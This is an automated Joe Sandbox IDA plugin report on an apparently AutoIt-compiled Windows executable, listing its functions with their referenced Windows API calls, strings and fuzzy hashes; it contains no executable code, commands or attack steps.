Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 694b547f5db2f47bd4f091a1fd0abb6b3a163aec5da2e09ff326ebef53e6837d
Instruction ID: 29e0e8850066bbc1dfded225ea24a290d03467fe54aaa02123219fdaf192800b
Opcode Fuzzy Hash: 694b547f5db2f47bd4f091a1fd0abb6b3a163aec5da2e09ff326ebef53e6837d
Instruction Fuzzy Hash: AA01BBB5650348FFEB10ABA5DC8DF6B3BACEB89711F004421FA05DB2A1CA759814CB30

Function 00D79428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D7947C
VariantInit.OLEAUT32(?), ref: 00D7954D
VariantInit.OLEAUT32(?), ref: 00D7964E
VariantClear.OLEAUT32(?), ref: 00D79658
VariantClear.OLEAUT32(?), ref: 00D796B5

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00D79631
Null Object assignment in FOR..IN loop, xrefs: 00D794DD, 00D7960B, 00D796C3

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: ca939c373a71af0f048f48c39a6d37d68f281f76ef125653d051254c38e91427
Instruction ID: b43cd96683b62138c1a2e0f01b22b34b4b97c018f06831ced206b39e304059b2
Opcode Fuzzy Hash: ca939c373a71af0f048f48c39a6d37d68f281f76ef125653d051254c38e91427
Instruction Fuzzy Hash: 9E91AD72A00219AFDF20DFA5C854FAEBBB8EF45714F14815AF519AB280E7709905CFB0

Function 00D79A72 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00D57652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D5758C,80070057,?,?,?,00D5799D), ref: 00D5766F
Part of subcall function 00D57652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D5758C,80070057,?,?), ref: 00D5768A
Part of subcall function 00D57652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D5758C,80070057,?,?), ref: 00D57698
Part of subcall function 00D57652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00D5758C,80070057,?), ref: 00D576A8

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00D79B1B
_memset.LIBCMT ref: 00D79B28
_memset.LIBCMT ref: 00D79C6B
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00D79C97
CoTaskMemFree.OLE32(?), ref: 00D79CA2

Strings

NULL Pointer assignment, xrefs: 00D79CF0

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 401223ad152c496bcc06224c460f921a87544ce7a2c5f6d488327d864ac3105c
Instruction ID: 50ae78fd6346dd87c2b29b5ea244706c7128528ae0ef34831355996165f94961
Opcode Fuzzy Hash: 401223ad152c496bcc06224c460f921a87544ce7a2c5f6d488327d864ac3105c
Instruction Fuzzy Hash: 50910D72D00219ABDF10DF95DC95ADEBBB9EF08710F108159F519A7281EB715A44CFB0

Function 00D86FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00D87093
SendMessageW.USER32(?,00001036,00000000,?), ref: 00D870A7
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00D870C1
_wcscat.LIBCMT ref: 00D8711C
SendMessageW.USER32(?,00001057,00000000,?), ref: 00D87133
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00D87161

Strings

SysListView32, xrefs: 00D87065

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 80706f8ef10880f78865bbf25bdba69a4b34bee5043c926b144e9f085e8f9189
Instruction ID: 363b805f63e7fcb84566e698080b66c6a678f765d69959e7e5829204cbd3cfc5
Opcode Fuzzy Hash: 80706f8ef10880f78865bbf25bdba69a4b34bee5043c926b144e9f085e8f9189
Instruction Fuzzy Hash: 60417071A04309AFDB21AF64CC85BEE77B8EF08354F24096AF585E7291D671DD848B70

Function 00D7EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00D63E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00D63EB6
Part of subcall function 00D63E91: Process32FirstW.KERNEL32(00000000,?), ref: 00D63EC4
Part of subcall function 00D63E91: CloseHandle.KERNEL32(00000000), ref: 00D63F8E

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D7ECB8
GetLastError.KERNEL32 ref: 00D7ECCB
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00D7ECFA
TerminateProcess.KERNEL32(00000000,00000000), ref: 00D7ED77
GetLastError.KERNEL32(00000000), ref: 00D7ED82
CloseHandle.KERNEL32(00000000), ref: 00D7EDB7

Strings

SeDebugPrivilege, xrefs: 00D7ECD6

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 13c2e5c09a419c414550fc545e1e2223426001c3b90468707132a8f4fb9f2df7
Instruction ID: df36cf6613668479d0792c9bfa732b8c9b209001cdff3125ce7234dfb25e0dd6
Opcode Fuzzy Hash: 13c2e5c09a419c414550fc545e1e2223426001c3b90468707132a8f4fb9f2df7
Instruction Fuzzy Hash: 06418C712002019FDB24EF24CC95F6DB7A5EF44714F088459F84A9B2D2EBB5E808CBB5

Function 00D63226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00D632C5

Strings

stop, xrefs: 00D63296
blank, xrefs: 00D63247
warning, xrefs: 00D632AE
info, xrefs: 00D63266
question, xrefs: 00D6327E

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 4b5b6f612455d666111b33e5dccc0c74874f7496a73b887c6647f00ff76fef26
Instruction ID: 4da90156c887e333a0b1a547ceaf150faca69cf4862871af12755ad0a2167218
Opcode Fuzzy Hash: 4b5b6f612455d666111b33e5dccc0c74874f7496a73b887c6647f00ff76fef26
Instruction Fuzzy Hash: 6311E731648756BFA7055B58ECA2DAAB3ACDF1D374F20002AF501A6281E7759B4046BD

Function 00D64534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00D6454E
LoadStringW.USER32(00000000), ref: 00D64555
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00D6456B
LoadStringW.USER32(00000000), ref: 00D64572
_wprintf.LIBCMT ref: 00D64598
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00D645B6

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00D64593

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: c81fb61e94ab82aa07d2fc87e2eae46831bc736ad136bd35bf012075965c57f1
Instruction ID: fc4ba75032f1ea28e033c52ccbf722f0030d8864cf26ed2b94ecd5e32fff4b89
Opcode Fuzzy Hash: c81fb61e94ab82aa07d2fc87e2eae46831bc736ad136bd35bf012075965c57f1
Instruction Fuzzy Hash: 560162F2900308BFE750A7A4DD89EEB776CEB08301F4005A5BB46E2151EA749E858B70

Function 00D8D74C Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D02612: GetWindowLongW.USER32(?,000000EB), ref: 00D02623

GetSystemMetrics.USER32(0000000F), ref: 00D8D78A
GetSystemMetrics.USER32(0000000F), ref: 00D8D7AA
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00D8D9E5
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00D8DA03
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00D8DA24
ShowWindow.USER32(00000003,00000000), ref: 00D8DA43
InvalidateRect.USER32(?,00000000,00000001), ref: 00D8DA68
DefDlgProcW.USER32(?,00000005,?,?), ref: 00D8DA8B

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: f6c38b844c7a737a15fccb234eddc0feb7241c406a7b98aa47b2887078b27832
Instruction ID: 5c0c72cb503587afb6d5a3ec86f1c3bddc3a7636f463c36d2d976a20cda60287
Opcode Fuzzy Hash: f6c38b844c7a737a15fccb234eddc0feb7241c406a7b98aa47b2887078b27832
Instruction Fuzzy Hash: 36B17A71600215EBDF18EF69C985BBD7BB2FF48701F188169EC88AB2D5D734A950CB60

Function 00D02A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00D3C417,00000004,00000000,00000000,00000000), ref: 00D02ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00D3C417,00000004,00000000,00000000,00000000,000000FF), ref: 00D02B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00D3C417,00000004,00000000,00000000,00000000), ref: 00D3C46A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00D3C417,00000004,00000000,00000000,00000000), ref: 00D3C4D6

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: d06afa7f2b42ec0d40846afd5c09f0ace81a35d7aa22eef1a287199dd8a883d6
Instruction ID: fe2b594d509268950d3ee43ef115835628777e3d17673b4c74a8996b5e91ff2c
Opcode Fuzzy Hash: d06afa7f2b42ec0d40846afd5c09f0ace81a35d7aa22eef1a287199dd8a883d6
Instruction Fuzzy Hash: 03410B30315780AADB358B288C9CB7A7B92AF45314F5C881DE09FD66E0CA75E841D730

Function 00D67368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00D6737F

Part of subcall function 00D20FF6: std::exception::exception.LIBCMT ref: 00D2102C
Part of subcall function 00D20FF6: __CxxThrowException@8.LIBCMT ref: 00D21041

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00D673B6
EnterCriticalSection.KERNEL32(?), ref: 00D673D2
_memmove.LIBCMT ref: 00D67420
_memmove.LIBCMT ref: 00D6743D
LeaveCriticalSection.KERNEL32(?), ref: 00D6744C
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00D67461
InterlockedExchange.KERNEL32(?,000001F6), ref: 00D67480

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 5d1c4406e9594814abfb98bf072334df7dee48c29c0bd89c8564844069f9b347
Instruction ID: a7b2767e2b52cfd604e9b17f513755a81fe19fda3d4f34ec9307d6e27bc8ce24
Opcode Fuzzy Hash: 5d1c4406e9594814abfb98bf072334df7dee48c29c0bd89c8564844069f9b347
Instruction Fuzzy Hash: 03318D75904219EBCF10DFA4DD89AAEBBB8EF44714F1481A5F904EB246DB309A10CBB4

Function 00D86442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00D8645A
GetDC.USER32(00000000), ref: 00D86462
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D8646D
ReleaseDC.USER32(00000000,00000000), ref: 00D86479
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00D864B5
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00D864C6
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00D89299,?,?,000000FF,00000000,?,000000FF,?), ref: 00D86500
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00D86520

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: f1ccabf322baca194605966d1f31d1da617dd465ee40b1de2a4c070440c532f5
Instruction ID: 1c43575efa97618e83feb3a5a3757dec2b7c55439f401842064b9f208870ab00
Opcode Fuzzy Hash: f1ccabf322baca194605966d1f31d1da617dd465ee40b1de2a4c070440c532f5
Instruction Fuzzy Hash: D3316972211214BFEB119F50CC8AFEA3FADEF09761F0841A5FE08DA2A5D6759841CB74

Function 00D5C072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00D5C087
_memcmp.LIBCMT ref: 00D5C0A9
_memcmp.LIBCMT ref: 00D5C0C1
_memcmp.LIBCMT ref: 00D5C0D4
_memcmp.LIBCMT ref: 00D5C0EE
_memcmp.LIBCMT ref: 00D5C101
_memcmp.LIBCMT ref: 00D5C119
_memcmp.LIBCMT ref: 00D5C134

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: c37d37041961d60a93aea1b9b16cc2542c1e1a445c41174ba3412a242c06b19d
Instruction ID: a443e5c9d3255c04800612525f1c516bb35752b2f6ed5447209b4d1b6f11f3b0
Opcode Fuzzy Hash: c37d37041961d60a93aea1b9b16cc2542c1e1a445c41174ba3412a242c06b19d
Instruction Fuzzy Hash: 3A21BE65610715BF9E10B5259C46FBF239CEE303AAB089020FD09966C2E751DE1986B5

Function 00D6ED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00D09997: __itow.LIBCMT ref: 00D099C2
Part of subcall function 00D09997: __swprintf.LIBCMT ref: 00D09A0C

Part of subcall function 00D1FEC6: _wcscpy.LIBCMT ref: 00D1FEE9

_wcstok.LIBCMT ref: 00D6EEFF
_wcscpy.LIBCMT ref: 00D6EF8E
_memset.LIBCMT ref: 00D6EFC1

Strings

X, xrefs: 00D6EFFE

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 03eb1d407fd45cb7d62fb7a55ede95164be27ac409c2f7f2256ebaa7e0215cf0
Instruction ID: 761258a2140f5127a396744ad98d0942a11544d4bb1513d5e2128eb0101b4d90
Opcode Fuzzy Hash: 03eb1d407fd45cb7d62fb7a55ede95164be27ac409c2f7f2256ebaa7e0215cf0
Instruction Fuzzy Hash: A3C18D755087409FC724EF24D891B9AB7E0EF95310F04492DF89A8B2A2DB70ED45CBB2

Function 00D01424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b50b7d9313b8e63200368ec233b03438a5ccbdd2cf97a425b5a2e08514421c3
Instruction ID: d65ff93394614df6857cf0cf90527a0b30359af0c08b38258b741eca535b348c
Opcode Fuzzy Hash: 3b50b7d9313b8e63200368ec233b03438a5ccbdd2cf97a425b5a2e08514421c3
Instruction Fuzzy Hash: 94713A34900109EFCB15DF98CC89BAEBB79FF85324F148159F919AA291C734AA51CBB4

Function 00D76E8A Relevance: 10.7, APIs: 7, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac7ecf7c854318cd5ea1da2773f6efa6020c708ba83f2efbbcbd25d79b1a59a4
Instruction ID: 1d23500e03fe87b07802ba9888368854c0fc08662e742f5a48624f8cb4e09570
Opcode Fuzzy Hash: ac7ecf7c854318cd5ea1da2773f6efa6020c708ba83f2efbbcbd25d79b1a59a4
Instruction Fuzzy Hash: 1461AF71508300ABD710EB24DC96F6BB7A9EF84714F54891DF989972E2EA70ED04CB72

Function 00D8B60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00FC5AD8), ref: 00D8B6A5
IsWindowEnabled.USER32(00FC5AD8), ref: 00D8B6B1
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00D8B795
SendMessageW.USER32(00FC5AD8,000000B0,?,?), ref: 00D8B7CC
IsDlgButtonChecked.USER32(?,?), ref: 00D8B809
GetWindowLongW.USER32(00FC5AD8,000000EC), ref: 00D8B82B
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00D8B843

Memory Dump Source

Source File: 00000000.00000002.1786101556.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true

Associated: 00000000.00000002.1786083170.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000D8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786149786.0000000000DB5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786199654.0000000000DBF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1786222612.0000000000DC8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d00000_N2sgk6jMa2.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 35f4e296eb801733696260ed13dddf3ddfe59a139ce7303b707894dfa5303f03
Instruction ID: f2606ad92c60693d6bf394fc5ff4c8dee29742f0ace3a5c827da0ab2527d0b51
Opcode Fuzzy Hash: 35f4e296eb801733696260ed13dddf3ddfe59a139ce7303b707894dfa5303f03
Instruction Fuzzy Hash: 82718E74600305AFDB20AF65CC95FBA7BB9EF89320F18446AE9459B3A1D731AC41CB74

Function 00D7F732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00D7F75C
_memset.LIBCMT ref: 00D7F825
